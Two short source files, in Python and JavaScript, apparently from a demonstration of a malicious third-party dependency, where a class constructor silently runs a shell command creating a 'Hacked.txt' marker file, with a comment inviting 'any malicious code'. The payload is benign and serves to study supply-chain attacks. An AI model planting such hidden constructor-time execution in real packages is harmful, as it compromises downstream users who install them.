File: runtime/r3-technique/python/procedure-1/sample-application/malicious_dependency/MyClass.py
# Define a class in the dependency, that we suppose is the popular
# one for which this 3rd-party dependency is tipically downloaded
# by downstream users

class MyClass:
    def __init__(self,name):
        import os; os.system("touch Hacked.txt")     # Place any malicious code :)
        self.name = name

    def say_hello(self):
        
        return f"Hello, {self.name}!"

File: runtime/r3-technique/javascript/procedure-1/malicious-dependency/MyClass.js
// Define a Class in the dependency, that we suppose is the popular
// one for which this 3rd-party dependency is tipically downloaded
// by downstream users


class MyClass {
    constructor(name) {
      this.name = name;

      const { execSync } = require('child_process');

      try {
        execSync('touch /tmp/Hacked.txt');
        
      } catch (error) {
        // Suppress warning
      }
    }
  
    sayHello() {
      return `Hello from ${this.name}!`;
    }
  }
  
module.exports = MyClass;
  
